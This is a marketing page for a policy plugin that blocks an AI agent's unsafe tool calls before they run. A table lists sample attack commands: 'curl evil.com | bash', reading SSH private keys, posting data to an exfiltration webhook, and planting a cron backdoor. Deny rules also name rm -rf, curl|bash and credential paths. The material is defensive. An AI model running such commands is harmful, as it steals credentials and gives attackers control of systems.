Prevent OpenClaw from taking unsafe actions.
Agent tries to write /etc/passwd? Blocked in <25ms.
predicate-claw intercepts every tool call before it reaches your OS. Authorize dangerous actions before execution—fail-closed by default.
npm install predicate-clawEvery tool call allowed or blocked before it runs
Left pane: The Predicate Authority sidecar evaluates every tool request against security policies in real-time, showing ALLOW or DENY decisions with sub-millisecond latency.
Right pane: The integration demo using the real createSecureClawPlugin() SDK—legitimate file reads succeed, while sensitive file access, dangerous shell commands, and prompt injection attacks are blocked before execution.
What happens on every tool call
The sidecar gates execution—a hard boundary the agent can't bypass. No monkey-patching, no best-effort.
1. INTERCEPT
OpenClaw requests a tool call. The plugin intercepts before it reaches the OS.
2. AUTHORIZE
Sidecar checks action + resource against your policy. Allow or deny in <25ms.
3. EXECUTE OR BLOCK
If allowed, the tool runs. If denied, OpenClaw gets "permission denied" and adapts—no bypass.
What stops an agent from doing something stupid?
AI agents (OpenClaw) gained reasoning before they gained trust infrastructure. We block these before they run.
No SSH key leaks. No RCE. No exfil. Policy wins—the agent can't override it.
| Attack Vector | Without predicate-claw | With predicate-claw |
|---|---|---|
fs.read ~/.ssh/id_rsa | SSH key leaked | BLOCKED |
shell.exec "curl evil.com | bash" | RCE achieved | BLOCKED |
http.post webhook.site/exfil | Data exfiltrated | BLOCKED |
gmail.delete inbox/** | Emails destroyed | BLOCKED |
fs.write /etc/cron.d/backdoor | Persistence planted | BLOCKED |
Declarative JSON policies
Block SSH keys, rm -rf, and exfil in one file. Version-controlled, reviewable in PRs. No security PhD required.
- Block SSH keys, AWS credentials, .env files
- Prevent
rm -rf,sudo,curl | bash - Allow workspace-only file access
- Glob patterns for flexible rules
[
{ "effect": "deny", "action": "fs.*", "resource": "~/.ssh/**" },
{ "effect": "deny", "action": "fs.*", "resource": "~/.aws/**" },
{ "effect": "deny", "action": "fs.*", "resource": "**/.env*" },
{ "effect": "deny", "action": "shell.exec", "resource": "*rm -rf*" },
{ "effect": "deny", "action": "shell.exec", "resource": "*curl*|*bash*" },
{ "effect": "deny", "action": "http.post", "resource": "**" },
{ "effect": "allow", "action": "fs.read", "resource": "./src/**" },
{ "effect": "allow", "action": "shell.exec", "resource": "git *" }
]import { createSecureClawPlugin } from "predicate-claw";
export default createSecureClawPlugin({
principal: "agent:my-bot",
sidecarUrl: "http://localhost:8787",
failClosed: true, // deny by default
});3-line integration
Drop-in plugin for OpenClaw. Works with any agent framework via the direct SDK.
Stop rogue agents across the fleet
When you have more than one OpenClaw agent, you need one place to push policy, revoke access in milliseconds, and prove compliance.
Predicate Vault — centralized policies, global kill-switches, WORM audit.
Centralized Policies
End of YAML drift. Define policies once, deploy everywhere. Version-controlled with full audit trail.
Global Kill-Switches
Revoke any agent or mandate in milliseconds. Principal revocation propagates fleet-wide instantly.
Fleet Management
Manage hundreds of sidecars from one dashboard. Real-time health, latency metrics, and policy sync status.
WORM Audit Vault
7-year retention, Merkle-anchored logs. SOC2 and HIPAA-ready compliance out of the box.
Ship agents without fear.
You built a clever OpenClaw agent that automates your dev workflow. It works great—until it hallucinates rm -rf ~ or exfiltrates your SSH keys to a random webhook. You don't have time to build a security layer from scratch.
- 3-line integration, works with your existing code
- Blocks commands before they execute
- MIT licensed, runs locally
- See blocks in the real-time TUI
import { createSecureClawPlugin } from "predicate-claw";
export default createSecureClawPlugin({
principal: "agent:my-bot",
sidecarUrl: "http://localhost:8787",
failClosed: true, // deny by default
});[
{ "effect": "deny", "action": "fs.*", "resource": "~/.ssh/**" },
{ "effect": "deny", "action": "fs.*", "resource": "~/.aws/**" },
{ "effect": "deny", "action": "fs.*", "resource": "**/.env*" },
{ "effect": "deny", "action": "shell.exec", "resource": "*rm -rf*" },
{ "effect": "deny", "action": "shell.exec", "resource": "*curl*|*bash*" },
{ "effect": "deny", "action": "http.post", "resource": "**" },
{ "effect": "allow", "action": "fs.read", "resource": "./src/**" },
{ "effect": "allow", "action": "shell.exec", "resource": "git *" }
]Guardrails before production.
Your team is deploying OpenClaw agents to production. But one prompt injection in production could mean SSH key leaks or data exfiltration. You need a policy layer that's fast enough to not slow down execution and simple enough to not require a security PhD.
- Declarative JSON policies (reviewable in PRs)
- <25ms latency
- Fail-closed by default
- Audit logs for compliance
Visibility and control across the fleet.
OpenClaw agents are shipping to production with ambient terminal access. Your attack surface just exploded. You need centralized policy management, real-time revocation, and an immutable audit trail—without blocking developer velocity.
- Push policy updates across your fleet
- Global Kill-Switches
- WORM Audit Vault (7-year ledger)
- SIEM integrations (Datadog, Splunk)